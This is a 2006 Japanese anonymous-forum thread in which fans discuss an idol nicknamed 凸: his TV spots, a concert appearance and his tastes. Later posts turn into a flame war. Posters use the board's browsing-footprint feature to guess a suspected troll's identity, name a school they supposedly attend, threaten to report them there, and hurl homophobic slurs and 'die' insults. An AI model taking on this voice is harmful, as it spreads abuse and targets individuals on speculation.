dkdk


これ何

706 :ユーは名無しネ:2006/12/23(土) 22:01:24
あー要するに704は凸安置か
お前、目厨とか使って安置バレバレ

707 :ユーは名無しネ:2006/12/23(土) 22:43:18
ゴミ付きも消えろ

708 :ユーは名無しネ:2006/12/23(土) 23:12:06
ID表示のある板に引っ越さないか?
向こうまだ使えるし
ココ安置の自演があってウザイ

709 :ユーは名無しネ:2006/12/24(日) 00:24:17
>703
口数は多くないけど
時々凸らしいナイスな発言アリ
食べる時キャワ
台所コーナーでは調理中のストップウォッチ係になって
ミルクライスをわしわし食べてた
全体的にモチついててよかったよ

710 :ユーは名無しネ:2006/12/24(日) 00:38:28
「どぅえぇ! マンゴープリン!」
と感動してマンゴープリンをウマソーに食ってたな
ミルクライスもそうだが
甘い系が好きなのか凸

711 :ユーは名無しネ:2006/12/24(日) 03:27:47
>706
目厨?
オマイ目安置?

712 :ユーは名無しネ:2006/12/24(日) 10:06:46
>709
d!自分も見れない地域なのでウレシス
少蔵ヨカタただお手紙オムとの見たカタ…
オープニングトークの時後ろで悪戯してる凸カバエエね

713 :ユーは名無しネ:2006/12/24(日) 14:04:06
僕ですをやるかと
request出してないけど

714 :ユーは名無しネ:2006/12/24(日) 14:10:21
凸が箱から出るの カワユ

715 :ユーは名無しネ:2006/12/24(日) 14:27:22
>714
あれ禿ワロタww
苺が箱開けた時にオ-バ-リアクショソしてたのもカバエかった

716 :ユーは名無しネ:2006/12/24(日) 16:07:23
>710
ドル誌で甘味スチっていってたな

滝つ紺レポホスイ

717 :ユーは名無しネ:2006/12/24(日) 17:20:34
凸君に メリークリスマス!!
凸担の皆にも メリークリスマス!!

718 :ユーは名無しネ:2006/12/24(日) 18:10:04
夕立もう見たくない
あんなに下品だと気持ち悪くて吐きそう
来週は見ないから
一応対処するところにはしとくね

719 :ユーは名無しネ:2006/12/24(日) 22:14:33
滝ついってきたノシ
ボックス席の一番後ろにパイプ椅子で見てたモヨンで自分の位置からだと座ってる時はまったく見えずorz
滝つに紹介されて立ち上がってくれてやっと見えた
赤いコートにチェックのシャツに黒のTシャツでGパンにベージュの靴
アクセサリー類は飛行石と数珠と指輪と時計は確認
滝つの問いかけに大きく手で○作ったり美茄子踊ったりしてたよ
滝つコールやる時は楽しそうに大声出してた感じだった
舞台に降りてきた時もニコニコしながら滝の後にくっついて踊ったりしててキャワだった
髪はぼさぼさで寝癖があって凸らしかった(w

720 :ユーは名無しネ:2006/12/24(日) 22:16:30
追加
席にいるときには中に着ていたチェックのシャツは花道回る時は腰にまいてた
凸流のオサレのつもりなのかな

721 :ユーは名無しネ:2006/12/24(日) 22:25:22
>719
詳しくd
凸カバエエな

722 :ユーは名無しネ:2006/12/24(日) 22:25:34
>719-720
詳しくレポdです!
姐さんオサレの『つもり』って(w
凸に失礼(w

723 :ユーは名無しネ:2006/12/25(月) 03:22:43
クリスマスに凸と過ごせるなんてウラヤマ

724 :ユーは名無しネ:2006/12/25(月) 13:35:56
ほんとウラヤマ…


725 :ユーは名無しネ:2006/12/25(月) 16:11:24
歌ワラ放送決まったね
来年も海老氏出てくれるかな
カツンが歌のコーナーなくなる訳ないとは思うが心配

726 :ユーは名無しネ:2006/12/25(月) 18:33:34
またボイス

727 :ユーは名無しネ:2006/12/25(月) 19:07:41
台詞っぽいとこがキャワ

728 :ユーは名無しネ:2006/12/25(月) 20:13:21
実は着ボ嫌いだから聞いてないけど日記やってくれないかな
月1回だと逆に話題に困りそう
毎日の方が日常いろいろ書けるし


729 :ユーは名無しネ:2006/12/25(月) 20:36:42
毎日日記なんてつけられるタイピじゃないと思うんだが

730 :ユーは名無しネ:2006/12/25(月) 21:16:30
そかな
滝リサ日記で意外と日記とか好きそうだと思ったけど
そういえば近代でドラマと映画に出たいって言ってたね
ちょい役でいいから出させてもらえたらいいね

731 :ユーは名無しネ:2006/12/25(月) 21:18:55
凸は男前だから
時代劇のヅラとか意外と似合いそうなキガス

732 :ユーは名無しネ:2006/12/25(月) 22:04:11
牛紺に事務が出るからうまくいけば凸もマイク持てるかも

733 :ユーは名無しネ:2006/12/26(火) 00:12:50
>729
禿同

734 :ユーは名無しネ:2006/12/26(火) 00:34:47
安置イラネ

735 :ユーは名無しネ:2006/12/26(火) 21:15:02


736 :ユーは名無しネ:2006/12/27(水) 04:19:49
夕立で凸の回答カットされてたorz
井上和歌のあだなの回答でオムにボードで殴られてたのに(w

737 :ユーは名無しネ:2006/12/27(水) 09:55:33
■ おすすめ2ちゃんねる 開発中。。。 by FOX ★
このスレを見ている人はこんなスレも見ています。(ver 0.20)
【離隔シタラ】LMEの株式自習室 テク7【泣カナイ】 [投資一般]
SekkeN【336】 [ジャニーズ2]



735か736が株式スレと石鹸スレを見てるヲバと安置か


738 :ユーは名無しネ:2006/12/27(水) 12:23:24
>>736
凸はなんて書いてたの?

739 :ユーは名無しネ:2006/12/27(水) 14:01:53
ハイパーは安置

740 :ユーは名無しネ:2006/12/27(水) 18:26:06
>738
ボインパイって書いてたらしいよ

客もバクショだったらしいけど
なんでカットされてんだろな

741 :ユーは名無しネ:2006/12/27(水) 18:42:51
ちょ凸バロス(w
なんか小学生みたいな発想だな
ボインて(w

742 :ユーは名無しネ:2006/12/27(水) 19:12:57
エロ凸バロス

743 :ユーは名無しネ:2006/12/27(水) 21:28:55
らいしってOA見たらわかるのに安置自演死ね

744 :ユーは名無しネ:2006/12/27(水) 21:30:13
■ おすすめ2ちゃんねる 開発中。。。 by FOX ★
このスレを見ている人はこんなスレも見ています。(ver 0.20)
【離隔シタラ】LMEの株式自習室 テク7【泣カナイ】 [投資一般]
SekkeN【336】 [ジャニーズ2]



↑安置はヲバでしかも石鹸雑魚担wwwwwwwwwwwwww

745 :ユーは名無しネ:2006/12/27(水) 21:31:33
足跡機能ついてくれたから自演バレバレなのに
FOXマンセー!(ありがd
凸安置はキチガイ

746 :ユーは名無しネ:2006/12/27(水) 21:33:17
とりんスレは日大ホモが書いてる事バレタし楽しいね♪
自演チャソって頭悪いわん♪

747 :ユーは名無しネ:2006/12/27(水) 21:34:38
http://live19.2ch.net/market/


いや、この凸安置もホモだな
この株式スレ男しかいないっぽい

748 :ユーは名無しネ:2006/12/27(水) 21:35:23
ちなみに数回どこかにdでも表示されないから
この安置はたくさんココを覗いてるwwwwww

749 :ユーは名無しネ:2006/12/27(水) 21:35:56
マーケットだからたぶん女はいないよ

750 :ユーは名無しネ:2006/12/27(水) 21:52:55
ホモが回してるってきめえ

751 :ユーは名無しネ:2006/12/27(水) 22:45:21
>>740
ボ…ボインパイ━━━━(゚∀゚)━━━━ !!!!!

凸ワロスww

752 :ユーは名無しネ:2006/12/27(水) 23:14:36
ハイパー使って何回もレス
キチガイ

753 :ユーは名無しネ:2006/12/27(水) 23:17:01
■ おすすめ2ちゃんねる 開発中。。。 by FOX ★
このスレを見ている人はこんなスレも見ています。(ver 0.20)
【離隔シタラ】LMEの株式自習室 テク7【泣カナイ】 [投資一般]


↑このホモ安置が見てる株式スレ↑

754 :ユーは名無しネ:2006/12/27(水) 23:18:12
穴埋め

755 :ユーは名無しネ:2006/12/27(水) 23:18:42


756 :ユーは名無しネ:2006/12/28(木) 00:15:37


757 :ユーは名無しネ:2006/12/28(木) 00:59:29
穴埋め

758 :ユーは名無しネ:2006/12/28(木) 05:17:58
ヒッキー基地は株で生活してるのね

759 :ユーは名無しネ:2006/12/28(木) 09:13:29
株式ヒキーは数分ごとにここを見てる
その安置だけが足跡つけてるから
だからレスがつく時は時間の間隔が狭くなっていかにもファソを装ってレスつけてたんだ
足跡機能で分かってしまった

760 :ユーは名無しネ:2006/12/28(木) 18:22:23
ボインパイなんて本当に凸かいたのかよ

761 :ユーは名無しネ:2006/12/28(木) 18:30:43
■ おすすめ2ちゃんねる 開発中。。。 by FOX ★
このスレを見ている人はこんなスレも見ています。(ver 0.20)
【離隔シタラ】LMEの株式自習室 テク7【泣カナイ】 [投資一般]
SekkeN【336】 [ジャニーズ2]


↑毎日細かく凸スレチェキ
どんだけ暇なんだ

762 :ユーは名無しネ:2006/12/28(木) 19:01:46
荒らしは自分が流したネタを何日でも自演レスする

763 :ユーは名無しネ:2006/12/28(木) 19:41:58
安置しか来なくて詰まらん

764 :ユーは名無しネ:2006/12/28(木) 19:58:55


765 :ユーは名無しネ:2006/12/28(木) 20:05:42


766 :ユーは名無しネ:2006/12/28(木) 20:18:33


767 :ユーは名無しネ:2006/12/28(木) 20:28:09
カミュ

768 :ユーは名無しネ:2006/12/28(木) 20:41:14
sent

769 :ユーは名無しネ:2006/12/28(木) 20:42:10
769

770 :ユーは名無しネ:2006/12/28(木) 20:43:35
770!

771 :ユーは名無しネ:2006/12/28(木) 20:46:08
あともうs古紙

772 :ユーは名無しネ:2006/12/28(木) 20:49:46
人伊奈

773 :ユーは名無しネ:2006/12/28(木) 20:57:30
うーん

774 :ユーは名無しネ:2006/12/29(金) 00:21:05
株スレが常時見えてる

775 :ユーは名無しネ:2006/12/29(金) 01:21:43
■ おすすめ2ちゃんねる 開発中。。。 by FOX ★
このスレを見ている人はこんなスレも見ています。(ver 0.20)
【偏差値上昇中】鴎友学園6【頭は下降中】 [お受験]
【離隔シタラ】LMEの株式自習室 テク7【泣カナイ】 [投資一般]
SekkeN【336】 [ジャニーズ2]
■ (vip931あらため) 「おすすめ2ちゃんねる」 その5 [2ch運用情報]


きめえスレ見てるんだなこの安置
鴎友学園6←ココを受験する安置かよwww


776 :ユーは名無しネ:2006/12/29(金) 01:23:45
■ おすすめ2ちゃんねる 開発中。。。 by FOX ★
このスレを見ている人はこんなスレも見ています。(ver 0.20)
キャワなハタチでも(^∀^)イイ!!しょたきゅん第23祥 [jr2]
シカオの紅白用の曲作ってないしなぁ [邦楽男性ソロ]
■ (vip931あらため) 「おすすめ2ちゃんねる」 その4 [2ch運用情報]
ABCを語ろうよ?17 [jr2]


安置の正体が分かったキタ━━━━━━(゚∀゚)━━━━━━!!!
凸スレと海老氏スレに足跡つけてる!
間違いなく「鴎友学園」の生徒wwwwwww


よーしココに通報してやる!馬鹿学校wwwwww

777 :ユーは名無しネ:2006/12/29(金) 14:29:01
むしろお前が安置じゃないのか?
正直もういいよ…凸話してクレ

778 :ユーは名無しネ:2006/12/29(金) 16:00:20
■ (vip931あらため) 「おすすめ2ちゃんねる」 その5 [2ch運用情報]


↑ヲタク安置

779 :ユーは名無しネ:2006/12/29(金) 18:00:53
119 :ユーは名無しネ:2006/12/29(金) 17:44:28
460 :ユーも名無しネ:2006/12/29(金) 17:31:00
>426
さっきも言ったが黒ばかり
ヒラメはファー付きダウンにジーンズしか覚えてないお
ヒラメ苺で武道館告知
ハケる時凸btm呼び止められておいしかったお

780 :ユーは名無しネ:2006/12/29(金) 18:16:24
好きな人の名前を書くと愛しあえるスレ☆155 [恋愛サロン]


ヘンなスレ見てるんだ

781 :ユーは名無しネ:2006/12/29(金) 18:38:43
>780
wwwwwwwwwwwwwwwww

凸の名前書くなよ恥だから

92 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)